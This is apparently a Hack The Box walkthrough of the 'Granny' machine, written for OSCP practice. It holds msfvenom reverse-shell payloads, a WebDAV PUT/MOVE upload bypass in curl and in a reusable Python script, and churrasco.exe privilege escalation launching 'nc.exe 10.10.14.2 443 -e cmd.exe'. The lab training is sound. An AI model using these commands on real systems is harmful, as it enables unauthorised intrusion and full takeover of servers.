In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan and results
# Nmap 7.94 scan initiated Thu Oct 19 23:37:25 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/granny/results/10.10.10.15/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/granny/results/10.10.10.15/scans/xml/_quick_tcp_nmap.xml 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-19 23:37:32 EDT for 35s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 6.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Server Date: Fri, 20 Oct 2023 03:38:01 GMT
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 19 23:38:07 2023 -- 1 IP address (1 host up) scanned in 42.05 seconds
Nikto results
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.15
+ Target Hostname: 10.10.10.15
+ Target Port: 80
+ Start Time: 2023-10-19 23:38:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ /: Retrieved microsoftofficewebserver header: 5.0_Pub.
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /8wM33dO2.axd: Retrieved x-aspnet-version header: 1.1.4322.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nikto-test-SMiPy4qL.html: HTTP method 'PUT' allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
+ /nikto-test-SMiPy4qL.html: HTTP method 'DELETE' allows clients to delete files on the web server. See: https://cwe.mitre.org/data/definitions/650.html
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: WebDAV enabled (UNLOCK COPY PROPPATCH MKCOL SEARCH PROPFIND LOCK listed as allowed).
+ /: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll. See: https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142960(v%3Dexchg.65)
+ /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /postinfo.html: Microsoft FrontPage default file found. See: CWE-552
+ /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_private/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information). See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376
+ /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0114
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 7676 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time: 2023-10-20 00:22:39 (GMT-4) (2669 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
edit hosts file
╰─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.52 htb.local mantis.htb.local
10.10.10.179 MEGACORP.LOCAL MULTIMASTER.MEGACORP.LOCAL
10.10.10.172 MEGABANK.LOCAL MONTEVERDE.MEGABANK.LOCAL
10.10.10.248 intelligence.htb dc.intelligence.htb
192.168.173.165 heist.offsec DC01.heist.offsec
10.10.10.15 granny
Nikto confirms that PUT (and MOVE) are allowed, so we can upload files over WebDAV.
Generate an ASPX reverse shell with msfvenom. Two payloads were created, x86 and x64, because the target architecture was not yet known.
-f aspx -o shell64.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3390 bytes
Saved as: shell64.aspx
╭─kali@kali ~/HTB/granny
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=80 EXITFUNC=thread -f aspx -o shell86.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2709 bytes
Saved as: shell86.aspx
╭─kali@kali ~/HTB/granny
╰─$
Uploading the .aspx directly with curl failed, while a .txt test file uploaded fine: IIS 6 WebDAV refuses PUT for file extensions that have a script mapping (such as .aspx), but MOVE is not subject to the same check. The workaround is to PUT the payload under a harmless extension (.txt here, .exe.gif for the executables later) and then MOVE it to its real name.
First rename the x86 shell so it carries a .txt extension:
╭─kali@kali ~/HTB/granny
╰─$ cp shell86.aspx shell86.aspx.txt
╭─kali@kali ~/HTB/granny
╰─$
Upload the file with curl and PUT:
╭─kali@kali ~/HTB/granny
╰─$ curl -X PUT --upload-file shell86.aspx.txt http://granny/shell86.aspx.txt
╭─kali@kali ~/HTB/granny
╰─$
Use MOVE (nikto confirmed it is allowed) to rename it back to .aspx:
╰─$ curl -X MOVE --header "Destination:http://granny/shell86.aspx" http://granny/shell86.aspx.txt
╭─kali@kali ~/HTB/granny
╰─$
Set up a listener on port 80, request shell86.aspx from a web browser, and we catch the shell:
╭─kali@kali ~/HTB/granny/Windows-Exploit-Suggester ‹master●›
╰─$ nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1040
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
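The PUT-then-MOVE trick above, as an added worked example that is not part of the original writeup. The client side mirrors the curl steps (OPTIONS to confirm PUT and MOVE are advertised, a direct PUT first, then PUT under a staging extension and MOVE to the real name) and returns status codes so each step can be checked, which the bare curl invocations above do not show. The server side, FakeIis6Dav, is a constructed stand-in for the target's WebDAV, not IIS code: it is assumed to refuse PUT for .asp/.aspx and to skip that check on MOVE, which is the behaviour the writeup relies on. Names such as upload_via_move and start_stand_in are mine.

```python
"""WebDAV PUT-then-MOVE extension bypass, with a constructed IIS 6 stand-in."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Assumption modelled on the writeup: PUT of .aspx was refused, PUT of
# .txt/.gif accepted, and MOVE never checked the destination extension.
BLOCKED_PUT_EXT = (".asp", ".aspx")


class FakeIis6Dav(BaseHTTPRequestHandler):
    """Constructed stand-in for the target's WebDAV, not real IIS code."""
    files = {}  # path -> bytes, reset by start_stand_in()

    def log_message(self, *args):
        pass  # keep the console quiet

    def _reply(self, status, body=b"", extra=None):
        self.send_response(status)
        for k, v in (extra or {}).items():
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, extra={"Allow": "OPTIONS, GET, PUT, DELETE, COPY, MOVE, PROPFIND"})

    def do_PUT(self):
        data = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.path.lower().endswith(BLOCKED_PUT_EXT):
            return self._reply(403)  # script-mapped extension: refused
        self.files[self.path] = data
        self._reply(201)

    def do_MOVE(self):
        dest = urlsplit(self.headers.get("Destination", "")).path
        if self.path not in self.files or not dest:
            return self._reply(404)
        self.files[dest] = self.files.pop(self.path)  # no extension check here
        self._reply(201)

    def do_GET(self):
        body = self.files.get(self.path)
        self._reply(200 if body is not None else 404, body or b"")


def dav_request(host, port, method, path, body=None, headers=None):
    """One HTTP request; returns (status, body) so every step is checkable."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def allowed_methods(host, port):
    """Parse the Allow header from OPTIONS, as nmap/nikto did above."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("OPTIONS", "/")
    resp = conn.getresponse()
    resp.read()
    allow = resp.getheader("Allow", "")
    conn.close()
    return {m.strip().upper() for m in allow.split(",") if m.strip()}


def upload_via_move(host, port, final_name, payload, stage_ext=".txt"):
    """PUT payload as <final_name><stage_ext>, then MOVE it to final_name.

    Returns (put_status, move_status). A direct PUT is tried first so the
    caller can see whether the bypass was actually needed (move_status is
    None when it was not).
    """
    methods = allowed_methods(host, port)
    if not {"PUT", "MOVE"} <= methods:
        raise RuntimeError(f"server does not advertise PUT and MOVE: {sorted(methods)}")
    direct, _ = dav_request(host, port, "PUT", "/" + final_name, payload)
    if direct in (200, 201, 204):
        return direct, None
    staged = "/" + final_name + stage_ext
    put_status, _ = dav_request(host, port, "PUT", staged, payload)
    dest = f"http://{host}:{port}/{final_name}"
    move_status, _ = dav_request(host, port, "MOVE", staged, headers={"Destination": dest})
    return put_status, move_status


def start_stand_in():
    """Start the fake server on a free localhost port; returns (server, port)."""
    FakeIis6Dav.files = {}
    srv = HTTPServer(("127.0.0.1", 0), FakeIis6Dav)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_stand_in()
    print(upload_via_move("127.0.0.1", port, "shell86.aspx", b"<%-- constructed test payload --%>"))
    print(dav_request("127.0.0.1", port, "GET", "/shell86.aspx"))
    srv.shutdown()
```

Against the real target the same client functions apply with host "granny" and port 80 (and a Destination without the port, as in the curl command); the point of returning the status codes is that a silent MOVE failure, for example a 403 or 502, is visible before you waste time wondering why the listener never fires.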
Priv esc
Gather systeminfo output (it can also be fed to Windows-Exploit-Suggester): Windows Server 2003 SP2, 32-bit, with a single hotfix installed.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 6 Hours, 29 Minutes, 35 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 736 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,277 MB
Page File: In Use: 193 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
c:\windows\system32\inetsrv>
A searchsploit for Windows Server 2003 gave the candidates below. After checking on Exploit-DB that it is verified, the Token Kidnapping local privilege escalation (6705) was chosen; churrasco.exe is the public exploit for it, and the output further down confirms how it works: a process running as NETWORK SERVICE reaches into the RPCSS service and borrows its SYSTEM token.
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash | windows/dos/9417.txt
Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Over | windows/dos/16166.py
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06 | windows/remote/2355.pm
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Esc | windows/local/6705.txt
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14 | windows/local/35936.py
Download churrasco.exe from https://github.com/Re4son/Churrasco/raw/master/churrasco.exe:
╰─$ wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
--2023-10-20 06:10:46-- https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
Resolving github.com (github.com)... 20.248.137.48
Connecting to github.com (github.com)|20.248.137.48|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/Re4son/Churrasco/master/churrasco.exe [following]
--2023-10-20 06:10:47-- https://raw.githubusercontent.com/Re4son/Churrasco/master/churrasco.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31232 (30K) [application/octet-stream]
Saving to: ‘churrasco.exe.1’
churrasco.exe.1 100%[====================================>] 30.50K --.-KB/s in 0.001s
2023-10-20 06:10:47 (28.3 MB/s) - ‘churrasco.exe.1’ saved [31232/31232]
╭─kali@kali ~/HTB/granny
The syntax is churrasco.exe -d "command".
Upload churrasco.exe the same way as the initial files (PUT as churrasco.exe.gif, then MOVE), and upload nc.exe as well:
╭─kali@kali ~/HTB/granny
╰─$ curl -X MOVE --header "Destination:http://granny/churrasco.exe" http://granny/churrasco.exe.gif
╭─kali@kali ~/HTB/granny
╰─$ curl -X PUT --upload-file nc.exe http://granny/nc.exe.txt
╭─kali@kali ~/HTB/granny
╰─$ curl -X MOVE --header "Destination:http://granny/nc.exe" http://granny/nc.exe.txt
╭─kali@kali ~/HTB/granny
Run it from C:\Inetpub\wwwroot, where the files landed. Set up a second listener (port 443) and have churrasco launch nc.exe with cmd.exe bound to it, so the shell it sends back runs as SYSTEM:
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is 424C-F32D
Directory of C:\Inetpub\wwwroot
10/20/2023 01:14 PM <DIR> .
10/20/2023 01:14 PM <DIR> ..
04/12/2017 05:17 PM <DIR> aspnet_client
10/20/2023 01:13 PM 31,232 churrasco.exe
02/21/2003 06:48 PM 1,433 iisstart.htm
04/12/2017 05:17 PM <DIR> images
10/20/2023 01:13 PM 59,392 nc.exe
02/21/2003 06:48 PM 2,806 pagerror.gif
04/12/2017 05:17 PM 2,440 postinfo.html
10/20/2023 07:45 AM 7,168 reverse64.exe
10/20/2023 07:46 AM 73,802 reverse86.exe
10/20/2023 10:08 AM 70 rub.bat.txt
10/20/2023 08:01 AM 3,410 shell64.aspx
10/20/2023 01:01 PM 2,709 shell86.aspx
10/20/2023 07:48 AM 5 test.gif
04/12/2017 05:17 PM <DIR> _private
04/12/2017 05:17 PM 1,754 _vti_inf.html
04/12/2017 05:17 PM <DIR> _vti_log
12 File(s) 186,221 bytes
6 Dir(s) 1,298,030,592 bytes free
C:\Inetpub\wwwroot>.\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.2 443 -e cmd.exe"
.\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.2 443 -e cmd.exe"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
C:\Inetpub\wwwroot>
We catch the connection with nc and confirm we are NT AUTHORITY\SYSTEM:
╭─kali@kali ~/HTB/granny
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
C:\WINDOWS\TEMP>